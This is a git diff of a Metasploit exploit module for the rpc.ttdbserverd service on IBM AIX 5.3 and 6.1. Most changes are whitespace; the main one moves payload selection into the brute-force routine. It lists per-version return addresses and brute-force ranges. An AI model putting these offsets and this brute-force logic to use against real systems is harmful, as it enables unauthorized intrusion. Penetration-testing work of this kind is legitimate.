diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb index c7fc1cc0bc..44b2a65d06 100644 --- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb +++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ @@ -40,9 +40,9 @@ class Metasploit3 < Msf::Exploit::Remote { 'BadChars' => "\x00", }, - 'Targets' => + 'Targets' => [ - [ + [ 'IBM AIX Version 6.1.4', { 'Arch' => 'ppc', @@ -50,7 +50,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ret' => 0x20099430+4096, 'Addr1' => 0x2ff1ff50-8192, 'AIX' => '6.1.4', - 'Payload' => { 'AIX' => '6.1.4' }, 'Bruteforce' => { 'Start' => { 'Ret' => 0x20099430-8192 }, @@ -59,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote } } ], - [ + [ 'IBM AIX Version 6.1.3', { 'Arch' => 'ppc', @@ -67,7 +66,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ret' => 0x20099280+4096, 'Addr1' => 0x2ff1ffd0-8192, 'AIX' => '6.1.3', - 'Payload' => { 'AIX' => '6.1.3' }, 'Bruteforce' => { 'Start' => { 'Ret' => 0x20099280-8192 }, @@ -76,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote } } ], - [ + [ 'IBM AIX Version 6.1.2', { 'Arch' => 'ppc', @@ -84,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ret' => 0x20099280+4096, 'Addr1' => 0x2ff1ffd0-8192, 'AIX' => '6.1.2', - 'Payload' => { 'AIX' => '6.1.2' }, 'Bruteforce' => { 'Start' => { 'Ret' => 0x20099280-8192 }, @@ -93,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote } } ], - [ + [ 'IBM AIX Version 6.1.1', { 'Arch' => 'ppc', @@ -101,7 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ret' => 0x20099280+4096, 'Addr1' => 0x2ff1ffd0-8192, 'AIX' => '6.1.1', - 'Payload' => { 'AIX' => '6.1.1' }, 'Bruteforce' => { 'Start' => { 'Ret' => 0x20099280-8192 }, @@ -110,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote } } ], - [ + [ 'IBM AIX Version 6.1.0', { 'Arch' => 'ppc', @@ -118,7 +114,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ret' => 0x20099280+4096, 'Addr1' => 0x2ff1ffd0-8192, 'AIX' => '6.1.0', - 'Payload' => { 'AIX' => '6.1.0' }, 'Bruteforce' => { 'Start' => { 'Ret' => 0x20099280-8192 }, @@ -127,7 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote } } ], - [ + [ 'IBM AIX Version 5.3.10 5.3.9 5.3.8 5.3.7', { 'Arch' => 'ppc', @@ -135,7 +130,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ret' => 0x20096ba0+4096, 'Addr1' => 0x2ff1ff14-8192, 'AIX' => '5.3.9', - 'Payload' => { 'AIX' => '5.3.9' }, 'Bruteforce' => { 'Start' => { 'Ret' => 0x20096ba0-8192 }, @@ -144,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote } } ], - [ + [ 'IBM AIX Version 5.3.10', { 'Arch' => 'ppc', @@ -152,7 +146,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ret' => 0x20096bf0+4096, 'Addr1' => 0x2ff1ff14-8192, 'AIX' => '5.3.10', - 'Payload' => { 'AIX' => '5.3.10' }, 'Bruteforce' => { 'Start' => { 'Ret' => 0x20096bf0-8192 }, @@ -161,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote } } ], - [ + [ 'IBM AIX Version 5.3.9', { 'Arch' => 'ppc', @@ -169,7 +162,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ret' => 0x20096ba0+4096, 'Addr1' => 0x2ff1ff14-8192, 'AIX' => '5.3.9', - 'Payload' => { 'AIX' => '5.3.9' }, 'Bruteforce' => { 'Start' => { 'Ret' => 0x20096ba0-8192 }, @@ -178,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote } } ], - [ + [ 'IBM AIX Version 5.3.8', { 'Arch' => 'ppc', @@ -186,7 +178,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ret' => 0x20096c10+4096, 'Addr1' => 0x2ff1ff98-8192, 'AIX' => '5.3.8', - 'Payload' => { 'AIX' => '5.3.8' }, 'Bruteforce' => { 'Start' => { 'Ret' => 0x20096c10-8192 }, @@ -195,7 +186,7 @@ class Metasploit3 < Msf::Exploit::Remote } } ], - [ + [ 'IBM AIX Version 5.3.7', { 'Arch' => 'ppc', @@ -203,7 +194,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ret' => 0x20096c10+4096, 'Addr1' => 0x2ff1ff98-8192, 'AIX' => '5.3.7', - 'Payload' => { 'AIX' => '5.3.7' }, 'Bruteforce' => { 'Start' => { 'Ret' => 0x20096c10-8192 }, @@ -212,7 +202,7 @@ class Metasploit3 < Msf::Exploit::Remote } } ], - [ + [ 'Debug IBM AIX Version 6.1', { 'Arch' => 'ppc', @@ -220,7 +210,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ret' => 0xaabbccdd, 'Addr1' => 0xddccbbaa, 'AIX' => '6.1.4', - 'Payload' => { 'AIX' => '6.1.4' }, 'Bruteforce' => { 'Start' => { 'Ret' => 0xaabbccdd }, @@ -229,7 +218,7 @@ class Metasploit3 < Msf::Exploit::Remote } } ], - [ + [ 'Debug IBM AIX Version 5.3', { 'Arch' => 'ppc', @@ -237,7 +226,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Ret' => 0xaabbccdd, 'Addr1' => 0xddccbbaa, 'AIX' => '5.3.10', - 'Payload' => { 'AIX' => '5.3.10' }, 'Bruteforce' => { 'Start' => { 'Ret' => 0xaabbccdd }, @@ -252,8 +240,15 @@ class Metasploit3 < Msf::Exploit::Remote end def brute_exploit(brute_target) + + if not @aixpayload + datastore['AIX'] = target['AIX'] + @aixpayload = regenerate_payload.encoded + end + + print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret']) + begin - print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret']) sunrpc_create('tcp', 100083, 1)